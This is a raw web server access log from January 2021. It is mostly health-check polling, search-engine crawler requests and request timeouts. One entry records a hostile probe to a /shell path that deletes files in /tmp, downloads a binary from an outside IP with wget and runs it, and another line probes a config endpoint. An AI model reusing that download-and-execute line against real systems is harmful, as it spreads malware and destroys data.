195.56.55.225 - - [08/Jan/2021:20:56:43 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
71.6.165.200 - - [08/Jan/2021:20:56:52 +0100] "GET /favicon.ico HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
66.249.64.89 - - [08/Jan/2021:20:57:21 +0100] "GET /event/2017/09/05/table/all/all HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.108 - - [08/Jan/2021:20:57:22 +0100] "GET /gal/ug5/index.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:20:58:47 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:00:50 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:02:53 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.83.67.225 - - [08/Jan/2021:21:03:00 +0100] "-" 408 - "-" "-"
193.224.219.40 - - [08/Jan/2021:21:04:00 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.0 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:21:04:56 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:06:59 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.62 - - [08/Jan/2021:21:07:22 +0100] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.33 - - [08/Jan/2021:21:07:22 +0100] "GET /event/2008/09/20/day/all/all HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.133.17.136 - - [08/Jan/2021:21:08:19 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:21:08:54 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:21:08:54 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:21:09:02 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
107.6.171.186 - - [08/Jan/2021:21:09:41 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:21:11:05 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:13:09 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.60 - - [08/Jan/2021:21:13:24 +0100] "GET /event/2010/06/28/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:21:15:13 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.62 - - [08/Jan/2021:21:15:35 +0100] "GET /event/2010/05/01/month/all/all/1 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:21:17:16 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.88 - - [08/Jan/2021:21:17:21 +0100] "GET /event/2016/09/25/table/all/all HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.87 - - [08/Jan/2021:21:17:21 +0100] "GET /event/2009/08/13/table/all/all HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.18 - - [08/Jan/2021:21:17:31 +0100] "GET /robots.txt HTTP/1.1" 404 289 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.21 - - [08/Jan/2021:21:17:31 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Jan/2021:21:17:38 +0100] "GET /sitemap.xml HTTP/1.1" 404 290 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
89.133.17.136 - - [08/Jan/2021:21:19:14 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:21:19:14 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:21:19:20 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:21:20:15 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:21:20:15 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:21:21:11 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:21:21:26 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:21:22:51 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:21:22:51 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:21:23:29 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:21:23:49 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:21:23:49 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:21:25:36 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.88 - - [08/Jan/2021:21:27:39 +0100] "GET /event/2010/08/05/table/all/all HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:21:27:39 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.62 - - [08/Jan/2021:21:27:40 +0100] "GET /event/2008/11/26/day/all/all HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:21:29:45 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
107.6.171.186 - - [08/Jan/2021:21:30:04 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
185.25.35.15 - - [08/Jan/2021:21:30:26 +0100] "GET /robots.txt HTTP/1.1" 404 286 "-" "robots"
185.25.35.10 - - [08/Jan/2021:21:30:28 +0100] "GET /?feed=atom HTTP/1.1" 304 - "-" "magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)"
104.244.76.69 - - [08/Jan/2021:21:30:48 +0100] "GET / HTTP/1.1" 200 1155 "http://4sy6gyks6vegqd3z.onion/node/18468" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
195.56.55.225 - - [08/Jan/2021:21:31:48 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:33:52 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:35:55 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.62 - - [08/Jan/2021:21:37:46 +0100] "GET /event/2018/08/28/day/all/all HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:21:37:58 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:40:01 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:42:04 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
176.63.5.4 - - [08/Jan/2021:21:42:36 +0100] "-" 408 - "-" "-"
176.63.5.4 - - [08/Jan/2021:21:42:36 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:21:44:07 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:46:11 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.88 - - [08/Jan/2021:21:47:42 +0100] "GET /event/2018/06/13/week/all/all HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.88 - - [08/Jan/2021:21:47:42 +0100] "GET /event/2019/05/03/week/all/all HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:21:48:14 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:21:50:18 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
217.65.122.101 - - [08/Jan/2021:21:51:15 +0100] "-" 408 - "-" "-"
217.65.122.101 - - [08/Jan/2021:21:51:15 +0100] "-" 408 - "-" "-"
217.65.122.101 - - [08/Jan/2021:21:51:53 +0100] "-" 408 - "-" "-"
217.65.122.101 - - [08/Jan/2021:21:51:53 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:21:52:21 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
217.65.122.101 - - [08/Jan/2021:21:52:25 +0100] "-" 408 - "-" "-"
217.65.122.101 - - [08/Jan/2021:21:52:25 +0100] "-" 408 - "-" "-"
217.65.122.101 - - [08/Jan/2021:21:53:29 +0100] "-" 408 - "-" "-"
217.65.122.101 - - [08/Jan/2021:21:53:29 +0100] "-" 408 - "-" "-"
94.102.49.193 - - [08/Jan/2021:21:53:31 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:21:54:24 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
217.65.122.101 - - [08/Jan/2021:21:55:37 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:21:56:27 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.62 - - [08/Jan/2021:21:57:52 +0100] "GET /event/2010/07/28/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:21:58:30 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:00:33 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:02:36 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:04:39 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:06:42 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.89 - - [08/Jan/2021:22:08:00 +0100] "GET /event/2008/08/13/table/all/all/30 HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.60 - - [08/Jan/2021:22:08:01 +0100] "GET /event/2008/05/14/list/all/all HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:22:08:45 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:10:50 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.138.88.34 - - [08/Jan/2021:22:11:02 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:22:12:54 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:14:57 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:17:00 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
117.241.172.86 - - [08/Jan/2021:22:17:10 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 37.49.230.223/KillerSecurity/K1lLeR.arm;chmod+777+/tmp/K1lLeR.arm;sh+/tmp/K1lLeR.arm Selfrep.arm HTTP/1.1" 400 365 "-" "-"
94.102.49.193 - - [08/Jan/2021:22:17:56 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.49.193 - - [08/Jan/2021:22:17:57 +0100] "GET /robots.txt HTTP/1.1" 404 295 "-" "-"
66.249.64.33 - - [08/Jan/2021:22:18:02 +0100] "GET /event/2018/05/04/week/all/all/1 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.102.49.193 - - [08/Jan/2021:22:18:04 +0100] "GET /sitemap.xml HTTP/1.1" 404 296 "-" "-"
94.102.49.193 - - [08/Jan/2021:22:18:06 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 309 "-" "-"
94.102.49.193 - - [08/Jan/2021:22:18:10 +0100] "GET /favicon.ico HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
195.56.55.225 - - [08/Jan/2021:22:19:03 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:21:07 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:22:23:04 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:22:23:04 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:22:23:12 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:22:23:40 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:22:23:40 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:22:25:23 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
69.175.89.170 - - [08/Jan/2021:22:25:27 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
89.133.17.136 - - [08/Jan/2021:22:26:30 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:22:26:30 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:22:27:03 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:22:27:03 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:22:27:27 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.60 - - [08/Jan/2021:22:28:00 +0100] "GET /event/2010/08/16/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.87 - - [08/Jan/2021:22:28:01 +0100] "GET /robots.txt HTTP/1.1" 404 302 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.87 - - [08/Jan/2021:22:28:01 +0100] "GET /event/2019/01/12/week/all/all/1 HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:22:29:30 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
84.2.201.240 - - [08/Jan/2021:22:31:26 +0100] "-" 408 - "-" "-"
84.2.201.240 - - [08/Jan/2021:22:31:26 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:22:31:33 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
84.2.201.240 - - [08/Jan/2021:22:33:26 +0100] "-" 408 - "-" "-"
84.2.201.240 - - [08/Jan/2021:22:33:26 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:22:33:36 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:35:41 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:37:44 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.62 - - [08/Jan/2021:22:38:02 +0100] "GET /event/2009/01/11/day/all/all HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:22:39:47 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:41:50 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:43:53 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:45:57 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.132.92.249 - - [08/Jan/2021:22:47:54 +0100] "-" 408 - "-" "-"
89.132.92.249 - - [08/Jan/2021:22:47:54 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:22:48:00 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.89 - - [08/Jan/2021:22:48:00 +0100] "GET /event/2019/07/14/day/all/all/1 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:22:50:03 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:52:06 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:54:09 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:22:56:12 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.88 - - [08/Jan/2021:22:58:07 +0100] "GET /event/2010/05/31/table/all/all/30 HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:22:58:16 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
168.232.15.162 - - [08/Jan/2021:22:59:25 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:23:00:19 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
209.141.60.195 - - [08/Jan/2021:23:02:17 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
195.56.55.225 - - [08/Jan/2021:23:02:22 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.89 - - [08/Jan/2021:23:02:53 +0100] "GET /event/2010/06/03/week/all/all HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.88 - - [08/Jan/2021:23:03:32 +0100] "GET /event/2010/06/03/day/all/all HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.88 - - [08/Jan/2021:23:04:24 +0100] "GET /event/2010/06/03/list/all/all HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:23:04:25 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.88 - - [08/Jan/2021:23:05:16 +0100] "GET /event/2010/06/03/table/all/all HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:23:06:29 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.62 - - [08/Jan/2021:23:08:13 +0100] "GET /event/2009/01/04/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:23:08:33 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:10:36 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:12:39 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
54.70.53.60 - - [08/Jan/2021:23:13:08 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"
40.94.27.43 - - [08/Jan/2021:23:13:34 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
40.94.27.47 - - [08/Jan/2021:23:13:37 +0100] "GET /favicon.ico HTTP/1.1" 404 290 "http://hosting5.deja.hu/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:23:14:42 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
206.189.135.73 - - [08/Jan/2021:23:16:29 +0100] "GET / HTTP/1.1" 200 1155 "-" "curl/7.58.0"
195.56.55.225 - - [08/Jan/2021:23:16:45 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.60 - - [08/Jan/2021:23:18:23 +0100] "GET /event/2010/08/02/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:23:18:48 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:20:50 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
167.114.175.39 - - [08/Jan/2021:23:21:59 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:23:22:54 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:25:03 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:27:08 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.62 - - [08/Jan/2021:23:28:21 +0100] "GET /event/2018/09/27/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.89 - - [08/Jan/2021:23:28:22 +0100] "GET /event/2008/02/17/day/all/all/1 HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:23:29:11 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:31:14 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:23:33:21 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
